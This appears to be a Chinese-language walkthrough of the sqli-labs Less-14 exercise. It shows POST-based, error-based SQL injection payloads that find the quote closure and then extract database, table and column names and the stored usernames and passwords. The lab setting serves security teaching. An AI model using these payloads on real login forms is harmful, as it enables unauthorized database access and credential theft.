less-14 post+报错注入
使用burp suite抓包,分析报文体
使用harkbar插件中的post data进行注入:
尝试注入,判断闭合方式:
uname=" or 1=1 #&passwd=&submit=Submit 成功登录,说明闭合方式为””
添加一个)测试是否会报错:
uname=") or 1=1 #&passwd=&submit=Submit 出现错误回显.
说明有报错信息回显,我们可以采用报错注入:
获取当前数据库:
uname=" union select count(*),concat(database(),’/’,floor(rand(0)*2))x from information_schema.columns group by x#&passwd=&submit=Submit
获取全部数据库:
逐个输出:
uname=" union select count(*),concat((select schema_name from information_schema.schemata limit 0,1),’/’,floor(rand(0)*2))x from information_schema.schemata group by x #&passwd=&submit=Submit
合并输出:
uname=" union select count(*),concat((select group_concat(schema_name) from information_schema.schemata ),’/’,floor(rand(0)*2))x from information_schema.schemata group by x #&passwd=&submit=Submit
获取security库信息:
表名:
Select和group_concat连用时不报错所以这里只能使用limit逐个输出:
uname=" union select count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1 ),’/’,floor(rand(0)*2))x from information_schema.tables group by x #&passwd=&submit=Submit
获取users表中信息:
字段:
uname=" union select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ ),’/’,floor(rand(0)*2))x from information_schema.tables group by x #&passwd=&submit=Submit
获取username字段的信息:
uname=" union select count(*),concat((select username from security.users limit 0,1),’/’,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
获取password字段的信息:
uname=" union select count(*),concat((select password from security.users limit 0,1),’/’,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
将username和password连接后输出:
uname=" union select count(*),concat((select concat_ws(’~’,username,password) from security.users limit 0,1),’/’,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
持续更新中。。。。